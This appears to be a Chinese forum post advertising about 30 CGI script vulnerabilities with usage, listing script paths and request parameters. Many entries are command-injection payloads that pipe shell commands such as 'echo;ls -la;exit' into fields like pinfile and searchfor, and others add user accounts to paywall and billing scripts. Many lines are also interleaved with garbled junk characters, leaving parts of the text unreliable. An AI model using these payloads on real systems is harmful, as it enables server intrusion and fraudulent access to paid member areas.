Cgi-bin 30个漏洞＋使用方法

admin

==============================
: [0 a( k6 R) n, Z; X
/smspass.pl
username=username&password=password

; W5 J  C. z2 B. d/index.cgi
4 c2 e& I! |, o6 ]* Iwei=ren&gen=command
0 Y% z" I8 p3 w$ d3 `
/passmaster.cgi
$ h' U- X# `* H0 \% o4 d/ rAction=Add&Username=Username&Password=Password

/accountcreate.cgi
# g) N" A$ f+ S, G: Vusername=username&password=password&ref1=|echo;ls|

4 p/ E, p  ~8 E, I! I6 w+ t/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
5 V! d' k4 I  G9 @" s
. E, d3 u4 f! `# P, e# w' i9 k% F/addusr.pl
( m/ A& B. }/ L& n' S) c  c9 r/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

- {, j: I# A6 P3 [3 J/ccbill-local.asp
post_values=username:password
3 o8 H- }4 c1 q6 v9 Z4 w! i; J
* v9 V" s9 P" V6 b- F/count.cgi
" [; g0 E3 h" i. Y$ o1 spinfile=|echo;ls -la;exit|
1 Z! K  W- O; @! _
; a. w7 E1 ^0 Z: g; W/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

0 T) f. H9 x+ c  P( K) ^6 E/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
* T* m3 z0 b8 i) Q. D& z2 f_browser_out=|echo;ls -la;exit;|

) L  Q; I' A, p$ X/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
: @1 m! S$ n  H6 |cmd=ADD&user=username&pass=password
) ^7 l' s7 c( {5 g1 U! a8 {+ z
/probecontrol.cgi
command=enable&username=username&password=password
( F+ h2 j; B+ s! M
  s  M# Q2 C: y: M9 H/recon.cgi
. x: [: |2 U( D- K4 L9 tsearchoption=3&searchfor=echo;ls -la;exit
; v7 o" R& G6 Q
/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
# L0 P" l: q4 ~; ]cmd=ADD&user=username&pass=password

8 w" X# i( M* g1 A/ibill*.pl
0 Q2 ^6 K  B. xreqtype=add&authpwd=authpwd&username=username&password=password
# w" n& ~8 o7 ~: U/ V
: R; O$ h% T1 @' P* {4 a6 Q3 t/cpay.cgi
& j4 y. o6 d% P, F9 Q' j9 Q1 a5 Hcommand=add_member&username=username(EMAIL)&password=password(DES)
0 k- b% M8 Z' U8 k- B
/globill_ut.cgi
: |$ }: w) U  {; Tdo=add&username=username&password=password&wpassword=password

  d% T0 c# r7 T) u/usercontrol.cgi
9 h4 Z* c# ]  H' [! E0 x! v; c, Kcommand=enable&username=USER&password=PASS
- ^' j, w2 J0 ]. T* ^
! l" V9 W. _* G! z! y/globoSALErum.cgi
8 a1 A* v' y: H/ p9 x2 Naction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

- e9 G# I/ _" i, p/pincount.cgi
) H/ p  u  H. t& j/ w/cgi-bin/mastergate/pincount.cgi
- [; J1 E& V" F. U( a" |pinfile=|echo;pwd;exit|
1 H; m7 g8 H2 c& N7 T% ?8 q7 y
) w" n6 ~: G8 |; @( e4 m5 N/accountcreate.cgi
( g" B9 P) M# X% C0 H, s/cgi-bin/gateway/accountcreate.cgi
# h8 I0 v! @% ?( J' J, H% busername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
6 ?# a# E: Z/ ~6 T$ P; l1 CADD+;echo;pwd;exit
# }  n; }9 J4 n+ j
/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
- w* F: ~* o! n7 `8 Y4 G( o. esearchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

==============================